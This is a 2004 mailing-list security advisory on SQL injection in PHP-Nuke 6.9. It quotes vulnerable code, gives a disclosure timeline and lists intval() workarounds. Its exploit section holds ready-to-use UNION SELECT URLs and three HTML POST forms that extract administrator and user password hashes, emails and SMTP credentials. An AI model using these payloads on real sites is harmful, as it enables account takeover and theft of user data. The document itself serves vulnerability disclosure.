[VulnWatch] [SCSA-027] PHP-Nuke 6.9 SQL Injection Vulnerability

advisory_at_security-corporation.com
Date: 02/01/04

  • Next message: Peter Winter-Smith: "[VulnWatch] Web Crossing 4.x/5.x Denial of Service Vulnerability"
    Date: Sun,  1 Feb 2004 23:02:39 +0100
    To: vulnwatch@vulnwatch.org
    
    

    ======================================================================
    Security Corporation Security Advisory [SCSA-027]

    PHP-Nuke 6.9 SQL Injection Vulnerability
    ======================================================================

    PROGRAM: PHP-Nuke
    HOMEPAGE: http://www.phpnuke.org
    VULNERABLE VERSIONS: 6.9 and Prior
    RISK: MEDIUM/HIGH
    IMPACT: SQL Injection

    RELEASE DATE: 2004-02-01

    Security Corporation's Free weekly Newsletter :
    http://www.security-corporation.com/newsletter.html

    ======================================================================
    TABLE OF CONTENTS
    ======================================================================

    1..........................................................DESCRIPTION
    2..............................................................DETAILS
    3.............................................................EXPLOITS
    4............................................................SOLUTIONS
    5...........................................................WORKAROUND
    6..................................................DISCLOSURE TIMELINE
    7..............................................................CREDITS
    8...........................................................DISCLAIMER
    9...........................................................REFERENCES
    10............................................................FEEDBACK

    1. DESCRIPTION
    ======================================================================

    "PHP-Nuke is a news automated system specially designed to be used in
    Intranets and Internet. The Administrator has total control of his
    web site, registered users, and he will have in the hand a powerful
    assembly of tools to maintain an active and 100% interactive web
    site using databases"

    More information is available at http://www.phpnuke.org

    2. DETAILS
    ======================================================================

    - SQL Injection :

    PHP-Nuke contains an exploitable SQL injection vulnerability that can
    be used by attackers to cause the system to execute arbitrary
    SQL statements.

    The first vulnerabilities has been discovered in the
    /modules/Web_Links/index.php file.

    Vulnerable code :

    ----------------------------------------------------
    [...]
    function viewlink($cid, $min, $orderby, $show) {
    [...]
    $result = sql_query("select title,parentid from
    ".$prefix."_links_categories where cid=$cid", $dbi);
    list($title,$parentid)=sql_fetch_row($result, $dbi);
    [...]
    $title="<a href=modules.php?name=Web_Links>"._MAIN."</a>/$title";
    echo "<center><font class=\"option\"><b>"._CATEGORY.":
    $title</b></font></center><br>";
    echo "<table border=\"0\" cellspacing=\"10\" cellpadding=\"0\"
    align=\"center\"><tr>";
    [...]
    }
    [...]
    function brokenlink($lid) {
    [...]
    if (is_user($user)) {
    [...]
    $result = sql_query("select cid, title, url, description from
    ".$prefix."_links_links where lid=$lid", $dbi);
    list($cid, $title, $url, $description) = sql_fetch_row($result, $dbi);
    OpenTable();
    echo "<center><font
    class=\"option\"><b>"._REPORTBROKEN."</b></font><br><br><br><font
    class=\"content\">";
    echo "<form action=\"modules.php?name=Web_Links\" method=\"post\">";
    echo "<input type=\"hidden\" name=\"lid\" value=\"$lid\">";
    echo "<input type=\"hidden\" name=\"cid\" value=\"$cid\">";
    echo "<input type=\"hidden\" name=\"title\" value=\"$title\">";
    echo "<input type=\"hidden\" name=\"url\" value=\"$url\">";
    echo "<input type=\"hidden\" name=\"description\" value=\"$description\">";
    echo "<input type=\"hidden\" name=\"modifysubmitter\"
    value=\"$ratinguser\">";
    echo ""._THANKSBROKEN."<br><br>";
    echo "<input type=\"hidden\" name=\"l_op\" value=\"brokenlinkS\"><input
    type=\"submit\" value=\""._REPORTBROKEN."\"></center></form>";
    CloseTable();
    include("footer.php");
    } else {
    Header("Location: modules.php?name=$module_name");
    }
    }
    [...]
    function visit($lid) {
    global $prefix, $dbi;
    sql_query("update ".$prefix."_links_links set hits=hits+1 where
    lid=$lid", $dbi);
    $result = sql_query("select url from ".$prefix."_links_links where
    lid=$lid", $dbi);
    list($url) = sql_fetch_row($result, $dbi);
    Header("Location: $url");
    }
    [...]
    function rateinfo($lid) {
    global $prefix, $dbi;
    sql_query("update ".$prefix."_links_links set hits=hits+1 where
    lid=$lid", $dbi);
    $result = sql_query("select url from ".$prefix."_links_links where
    lid=$lid", $dbi);
    list($url) = sql_fetch_row($result, $dbi);
    Header("Location: $url");
    }
    [...]
    function viewlinkcomments($lid, $ttitle) {
    [...]
    $result=sql_query("SELECT ratinguser, rating, ratingcomments,
    ratingtimestamp FROM ".$prefix."_links_votedata WHERE ratinglid = $lid AND
    ratingcomments != '' ORDER BY ratingtimestamp DESC", $dbi);
    [...]
    while(list($ratinguser, $rating, $ratingcomments,
    $ratingtimestamp)=sql_fetch_row($result, $dbi)) {
    $ratingcomments = stripslashes($ratingcomments);
    [...]
    echo "<tr><td bgcolor=\"$bgcolor2\">"
    ."<font class=\"content\"><b> "._USER.": </b><a
    href=\"$nukeurl/modules.php?name=Your_Account&amp;op=userinfo&amp;username=$
    ratinguser\">$ratinguser</a></font>"
    [...]
    echo " $ratingcomments</font>"
    [...]
    }
    [...]
    function viewlinkeditorial($lid, $ttitle) {
    [...]
    $result=sql_query("SELECT adminid, editorialtimestamp, editorialtext,
    editorialtitle FROM ".$prefix."_links_editorials WHERE linkid = $lid",
    $dbi);
    $recordexist = sql_num_rows($result, $dbi);
    [...]
    if ($recordexist != 0) {
    while(list($adminid, $editorialtimestamp, $editorialtext,
    $editorialtitle)=sql_fetch_row($result, $dbi)) {
    $editorialtitle = stripslashes($editorialtitle); $editorialtext =
    stripslashes($editorialtext);
    [...]
    echo "<center><font
    class=\"option\"><b>'$editorialtitle'</b></font></center>"
    ."<center><font class=\"tiny\">"._EDITORIALBY." $adminid -
    $formatted_date</font></center><br><br>"
    ."$editorialtext";
    [...]
    }
    [...]
    switch($l_op) {
    [...]
    case "viewlink":
    viewlink($cid, $min, $orderby, $show);
    break;

    case "brokenlink":
    brokenlink($lid);
    break;
    [...]
    case "visit":
    visit($lid);
    break;

    case "rateinfo":
    rateinfo($lid, $user, $title);
    break;
    [...]
    case "viewlinkcomments":
    viewlinkcomments($lid, $ttitle);
    break;
    [...]
    case "viewlinkeditorial":
    viewlinkeditorial($lid, $ttitle);
    break;
    [...]
    }
    ?>
    ----------------------------------------------------

    In every functions we can see an SQL request of the type :
    select title,parentid from ".$prefix."_links_categories where cid=$cid

    Once executed, an element of this request is shown to the user.
    If, in this case with thefonction viewlink(), we give to $cid the value :
    0 UNION SELECT pwd,0 FROM nuke_authors

    The executed SQL request will be then :
    select title,parentid from nuke_links_categories where cid=0 UNION SELECT
    pwd,0 FROM nuke_authors

    We are thus going to go to look for in the table nuke_links_categories
    fields title and parentid where $cid is worth 0. However, this category
    does not exist.

    We are then going to look for in the table nuke_authors the field "pwd".
    This table contains all the informations about the administrators,
    the passwords (pwd) being encrypted. The displaying will not be the
    name of the category, but the coded password of an administrator.

    The seconds vulnerabilities has been discovered in the
    /modules/Downloads/index.php file.

    Vulnerable code :

    ----------------------------------------------------
    function viewdownload($cid, $min, $orderby, $show) {
    [...]
    $result2 = sql_query("SELECT cid, title, cdescription FROM
    ".$prefix."_downloads_categories WHERE parentid=$cid order by title", $dbi);
    $count = 0;
    while(list($cid2, $title2, $cdescription2) = sql_fetch_row($result2,
    $dbi)) {
    $cresult = sql_query("SELECT * FROM ".$prefix."_downloads_downloads
    WHERE cid=$cid2", $dbi);
    $cnumrows = sql_num_rows($cresult, $dbi);
    echo "<td><font class=\"option\"><strong><big>·</big></strong> <a
    href=\"modules.php?name=$module_name&d_op=viewdownload&amp;cid=$cid2\"><b>$t
    itle2</b></a></font>
    ($cnumrows)";
    [...]
    if ($cdescription2) {
    echo "<font class=\"content\">$cdescription2</font><br>";
    } else {
    echo "<br>";
    }
    [...]
    }
    [...]
    function getit($lid) {
    global $prefix, $dbi;
    sql_query("update ".$prefix."_downloads_downloads set hits=hits+1 WHERE
    lid=$lid", $dbi);
    $result = sql_query("SELECT url FROM ".$prefix."_downloads_downloads
    WHERE lid=$lid", $dbi);
    list($url) = sql_fetch_row($result, $dbi);
    Header("Location: $url");
    }
    [...]
    function viewdownloadeditorial($lid, $ttitle) {
    [...]
    $result=sql_query("SELECT adminid, editorialtimestamp, editorialtext,
    editorialtitle FROM ".$prefix."_downloads_editorials WHERE downloadid =
    $lid", $dbi);
    $recordexist = sql_num_rows($result, $dbi);
    [...]
    if ($recordexist != 0) {
    while(list($adminid, $editorialtimestamp, $editorialtext,
    $editorialtitle)=sql_fetch_row($result, $dbi)) {
    [...]
    echo "<center><font
    class=\"option\"><b>'$editorialtitle'</b></font></center>"
    ."<center><font class=\"tiny\">"._EDITORIALBY." $adminid -
    $formatted_date</font></center><br><br>"
    ."$editorialtext";
    [...]
    }
    [...]
    }
    [...]
    function viewdownloadcomments($lid, $ttitle) {
    [...]
    $result=sql_query("SELECT ratinguser, rating, ratingcomments,
    ratingtimestamp FROM ".$prefix."_downloads_votedata WHERE ratinglid = $lid
    AND ratingcomments != '' ORDER BY ratingtimestamp DESC", $dbi);
    [...]
    while(list($ratinguser, $rating, $ratingcomments,
    $ratingtimestamp)=sql_fetch_row($result, $dbi)) {
    [...}
    echo "<tr><td bgcolor=\"$bgcolor2\">"
    ."<font class=\"content\"><b> "._USER.": </b><a
    href=\"$nukeurl/modules.php?name=Your_Account&amp;op=userinfo&amp;username=$
    ratinguser\">$ratinguser</a></font>"
    ."</td>"
    ."<td bgcolor=\"$bgcolor2\">"
    ."<font class=\"content\"><b>"._RATING.": </b>$rating</font>"
    ."</td>"
    ."<td bgcolor=\"$bgcolor2\" align=\"right\">"
    ."<font class=\"content\">$formatted_date</font>"
    ."</td>"
    ."</tr>"
    ."<tr>"
    ."<td valign=\"top\">"
    ."<font class=\"tiny\">"._USERAVGRATING.": $useravgrating</font>"
    ."</td>"
    ."<td valign=\"top\" colspan=\"2\">"
    ."<font class=\"tiny\">"._NUMRATINGS.": $usertotalcomments</font>"
    ."</td>"
    ."</tr>"
    ."<tr>"
    ."<td colspan=\"3\">"
    ."<font class=\"content\">";
    [...]
    }
    [...]
    }
    [...]
    }
    [...]
    function modifydownloadrequest($lid) {
    [...]
    if ($blocknow != 1) {
    $result = sql_query("SELECT cid, title, url, description, name, email,
    filesize, version, homepage FROM ".$prefix."_downloads_downloads WHERE
    lid=$lid", $dbi);
    echo "<center><font
    class=\"option\"><b>"._REQUESTDOWNLOADMOD."</b></font><br><font
    class=\"content\">";
    while(list($cid, $title, $url, $description, $auth_name, $email,
    $filesize, $version, $homepage) = sql_fetch_row($result, $dbi)) {
    $title = stripslashes($title);
    $description = stripslashes($description);
    echo "<form action=\"modules.php?name=$module_name\"
    method=\"post\">"
    .""._DOWNLOADID.": <b>$lid</b></center><br><br><br>"
    .""._DOWNLOADNAME.":<br><input type=\"text\" name=\"title\"
    value=\"$title\" size=\"50\" maxlength=\"100\"><br><br>"
    .""._URL.":<br><input type=\"text\" name=\"url\" value=\"$url\"
    size=\"50\" maxlength=\"100\"><br><br>"
    .""._DESCRIPTION.": <br><textarea name=\"description\" cols=\"60\"
    rows=\"10\">$description</textarea><br><br>";
    $result2=sql_query("SELECT cid, title FROM
    ".$prefix."_downloads_categories order by title", $dbi);
    echo "<input type=\"hidden\" name=\"lid\" value=\"$lid\">"
    ."<input type=\"hidden\" name=\"modifysubmitter\" value=\"$ratinguser\">"
    .""._CATEGORY.": <select name=\"cat\">";
    [...]
    echo "</select><br><br>"
    .""._AUTHORNAME.":<br><input type=\"text\" name=\"auth_name\"
    value=\"$auth_name\" size=\"30\" maxlength=\"80\"><br><br>"
    .""._AUTHOREMAIL.":<br><input type=\"text\" name=\"email\"
    value=\"$email\" size=\"30\" maxlength=\"80\"><br><br>"
    .""._FILESIZE.": ("._INBYTES.")<br><input type=\"text\" name=\"filesize\"
    value=\"$filesize\" size=\"12\" maxlength=\"11\"><br><br>"
    .""._VERSION.":<br><input type=\"text\" name=\"version\"
    value=\"$version\" size=\"11\" maxlength=\"10\"><br><br>"
    .""._HOMEPAGE.":<br><input type=\"text\" name=\"homepage\"
    value=\"$homepage\" size=\"50\" maxlength=\"200\"><br><br>"
    ."<input type=\"hidden\" name=\"d_op\" value=\"modifydownloadrequestS\">"
    ."<input type=\"submit\" value=\""._SENDREQUEST."\"></form>";
    }
    }
    [...]
    }
    [...]
    function rateinfo($lid) {
    global $prefix, $dbi;
    sql_query("update ".$prefix."_downloads_downloads set hits=hits+1 WHERE
    lid=$lid", $dbi);
    $result = sql_query("SELECT url FROM ".$prefix."_downloads_downloads
    WHERE lid=$lid", $dbi);
    list($url) = sql_fetch_row($result, $dbi);
    Header("Location: $url");
    }
    [...]

    switch($d_op) {
    [...]
    case "viewdownload":
    viewdownload($cid, $min, $orderby, $show);
    break;
    [...]
    case "modifydownloadrequest":
    modifydownloadrequest($lid);
    break;
    [...]
    case "getit":
    getit($lid);
    break;
    [...]
    case "rateinfo":
    rateinfo($lid, $user, $title);
    break;
    [...]
    case "viewdownloadcomments":
    viewdownloadcomments($lid, $ttitle);
    break;
    [...]
    case "viewdownloadeditorial":
    viewdownloadeditorial($lid, $ttitle);
    break;
    [...]
    }
    ?>
    ----------------------------------------------------

    We can again notice that in every functions we can see that the
    SQL request containing a modifiable variable is not filtered.

    To note that in all this case, and contrary to the usual cases
    of injection SQL, these problems are present as well when
    magic_quotes_gpc is ON or OFF.

    The same problems have been also discovered in the
    /modules/Sections/index.php file.

    In mainfile.php file we can see the following code :

    ----------------------------------------------------
    foreach ($_GET as $secvalue) {
    if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) ||
    (eregi("<[^>]*object*\"?[^>]*>", $secvalue)) ||
    (eregi("<[^>]*iframe*\"?[^>]*>", $secvalue)) ||
    (eregi("<[^>]*applet*\"?[^>]*>", $secvalue)) ||
    (eregi("<[^>]*meta*\"?[^>]*>", $secvalue)) ||
    (eregi("<[^>]*style*\"?[^>]*>", $secvalue)) ||
    (eregi("<[^>]*form*\"?[^>]*>", $secvalue)) ||
    (eregi("<[^>]*img*\"?[^>]*>", $secvalue)) ||
    (eregi("\([^>]*\"?[^)]*\)", $secvalue)) ||
    (eregi("\"", $secvalue))) {
    die ("I don't like you...");
    }
    }

    foreach ($_POST as $secvalue) {
    if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue))
    || (eregi("<[^>]*style*\"?[^>]*>", $secvalue))) {
    Header("Location: index.php");
    die();
    }
    }
    ----------------------------------------------------

    As we can see, although GET requests are filtered, POST requests aren't.

    It is thus possible to use the brackets in SQL injection by using a form.

    3. EXPLOITS
    ======================================================================

    - SQL Injection :

    - http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20
    SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2

    - Will display both encrypted passwords of the administrator :
    http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SEL
    ECT%20pwd,0%20FROM%20nuke_authors

    More information is available at :
    http://www.security.nnov.ru/search/document.asp?docid=5201
    Apparently this fault was already announced, but considering that it
    was discovered in same times of the others we decided to make a
    description here.

    - http://[target]/modules.php?name=Web_Links&l_op=brokenlink&lid=0%20UNION
    %20SELECT%201,aid,name,pwd%20FROM%20nuke_authors
    Display the login, the name and the password of an administrator if
    the link 0 does not exist.

    - http://[target]/modules.php?name=Web_Links&l_op=visit&lid=-1%20UNION%20
    SELECT%20pwd%20FROM%20nuke_authors
    Re-steer towards the encrypted password.

    - http://[target]/modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20
    UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*
    Display all the logins administrator as well as their
    encrypted passwords.

    - http://[target]/modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1
    %20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors
    Display logins, names and encrypted passwords of all the administrators.

    - http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=-1%20
    UNION%20SELECT%20user_id,username,user_password%20FROM%20nuke_users/*
    Display all the pseudos of the users, followed by their encrypted password.

    - http://[target]/modules.php?name=Downloads&d_op=modifydownloadrequest&
    lid=-1%20UNION%20SELECT%200,username,user_id,user_password,name,
    user_email,user_level,0,0%20FROM%20nuke_users
    Display logins, ID, encrypted passwords, names, emails and levels of
    all the registered members.

    - http://[target]/modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20
    SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5

    - http://[target]/modules.php?name=Downloads&d_op=rateinfo&lid=-1%20UNION%20
    SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5
    Re-steer towards the encrypted password of the user id of which is 5.

    - http://[target]/modules.php?name=Downloads&d_op=viewdownloadcomments&
    lid=-1%20UNION%20SELECT%20username,user_id,user_password,1%20
    FROM%20nuke_users/*
    http://[target]/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1
    %20UNION%20SELECT%20username,1,user_password,user_id%20FROM%20nuke_users
    Display logins, ID and encrypted password of all the members.

    - http://[target]/modules.php?name=Sections&op=listarticles&secid=-1%20UNION
    %20SELECT%20pwd%20FROM%20nuke_authors

    - http://[target]/modules.php?name=Sections&op=listarticles&secid=-1%20UNION
    %20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/*

    - http://[target]/modules.php?name=Sections&op=printpage&artid=-1%20UNION%20
    SELECT%20aid,pwd%20FROM%20nuke_authors
    http://[target]/modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20
    SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors

    - http://[target]/modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20
    SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_autho
    rs/*

    - FORM :

    --------------------PHPNUKEexploit1.html--------------------
    <html>
    <head><title>PHP-Nuke 6.9 SQL Injection Vulnerability Exploit</title></head>
    <body>
    <form method="POST" action="http://[target]/modules.php?name=Sections">
    <input type="hidden" name="op" value="printpage">
    <input type="text" name="artid" value="-1 UNION SELECT
    CONCAT(name,char(58),aid),pwd FROM nuke_authors">
    <input type="submit">
    </form>
    <p align="right">A patch can be found on <a
    href="http://www.phpsecure.info" target="_blank">phpSecure.info</a><br>
    For more informations about this exploit :
    <a href="http://www.security-corporation.com/advisories-026.html"
    target="_blank"> Security-Corporation.com</a></p>
    </body>
    </html>
    --------------------PHPNUKEexploit1.html--------------------

    --------------------PHPNUKEexploit2.html--------------------
    <html>
    <head><title>PHP-Nuke 6.9 SQL Injection Vulnerability Exploit</title></head>
    <body>
    <form method="POST" action="http://[target]/modules.php?name=Downloads">
    <input type="hidden" name="d_op" value="viewdownloadeditorial">
    <input type="text" name="lid" value="-1 UNION SELECT
    config_name,0,config_value,0 FROM nuke_bbconfig where
    config_name=char(115,109,116,112,95,104,111,115,116) OR
    config_name=char(115,109,116,112,95,117,115,101,114,110,97,109,101) OR
    config_name=char(115,109,116,112,95,112,97,115,115,119,111,114,100)">
    <input type="submit">
    </form>
    <p align="right">A patch can be found on <a
    href="http://www.phpsecure.info" target="_blank">phpSecure.info</a><br>
    For more informations about this exploit :
    <a href="http://www.security-corporation.com/advisories-026.html"
    target="_blank"> Security-Corporation.com</a></p>
    </body>
    </html>
    --------------------PHPNUKEexploit2.html--------------------

    --------------------PHPNUKEexploit3.html--------------------
    <html>
    <head><title>PHP-Nuke 6.9 SQL Injection Vulnerability Exploit</title></head>
    <body>
    <form method="POST" action="http://[target]/modules.php?name=Downloads">
    <input type="hidden" name="d_op" value="viewdownloadeditorial">
    <input type="text" name="lid" value="-1 UNION SELECT
    char(120),NOW(),char(32),CONCAT(char(60,98,114,62,76,111,103,105,110,32,58,3
    2),uname,char(60,98,114,62,60,98,114,62,80,97,115,115,119,111,114,100,32,58,
    32),passwd,char(60,98,114,62))
    FROM nuke_popsettings">
    <input type="submit">
    </form>
    <p align="right">A patch can be found on <a
    href="http://www.phpsecure.info" target="_blank">phpSecure.info</a><br>
    For more informations about this exploit :
    <a href="http://www.security-corporation.com/advisories-026.html"
    target="_blank"> Security-Corporation.com</a></p>
    </body>
    </html>
    --------------------PHPNUKEexploit3.html--------------------

    4. SOLUTIONS
    ======================================================================

    You can found patch at the following link : http://www.phpsecure.info

    The PHP-Nuke Team was notified and the version 7.0 has been fixed.

    5. WORKAROUND
    ======================================================================

    In /modules/Web_Links/index.php add the following lines
    before "switch($l_op) {":

    ------------------------------------------------------------------------
    $cid = intval($cid);
    $min = intval($min);
    $lid = intval($lid);
    $parentid = intval($parentid);
    ------------------------------------------------------------------------

    In /modules/Downloads/index.php add the following lines
    before "switch($d_op) {":

    ------------------------------------------------------------------------
    $cid = intval($cid);
    $min = intval($min);
    $sid = intval($sid);
    $lid = intval($lid);
    $cat = intval($cat);
    ------------------------------------------------------------------------

    In /modules/Reviews/index.php add the following lines
    before "switch($rop) {":

    ------------------------------------------------------------------------
    $id = intval($id);
    $cid = intval($cid);
    ------------------------------------------------------------------------

    In /modules/Sections/index.php add the following lines
    before "switch($op) {":

    ------------------------------------------------------------------------
    $artid = intval($artid);
    $secid = intval($secid);
    ------------------------------------------------------------------------

    In /modules/Stories_Archive/index.php add the following line
    before "switch($sa) {":

    ------------------------------------------------------------------------
    $min = intval($min);
    ------------------------------------------------------------------------

    6. DISCLOSURE TIMELINE
    ======================================================================

    30/12/2003 Vulnerability discovered
    30/12/2003 Vendor notified
    06/01/2004 Vendor response
    06/01/2004 Security Corporation clients notified
    06/01/2004 Started e-mail discussions
    31/01/2004 Last e-mail received
    01/02/2004 Public disclosure

    7. CREDITS
    ======================================================================

    Germain Randaxhe aka frog-m@n <frog-man@security-corporation.com>
    from http://www.phpsecure.info is credited with this discovery

    8. DISLAIMER
    ======================================================================

    The information within this paper may change without notice. Use of
    this information constitutes acceptance for use in an AS IS condition.
    There are NO warranties with regard to this information. In no event
    shall the author be liable for any damages whatsoever arising out of
    or in connection with the use or spread of this information. Any use
    of this information is at the user's own risk.

    9. REFERENCES
    ======================================================================

    - Original Version:
    http://www.security-corporation.com/advisories-027.html

    - Version Française:
    http://www.security-corporation.com/index.php?id=advisories&a=027-FR

    10. FEEDBACK
    ======================================================================

    Please send suggestions, updates, and comments to:

    Security Corporation
    http://www.security-corporation.com
    advisory@security-corporation.com


  • Next message: Peter Winter-Smith: "[VulnWatch] Web Crossing 4.x/5.x Denial of Service Vulnerability"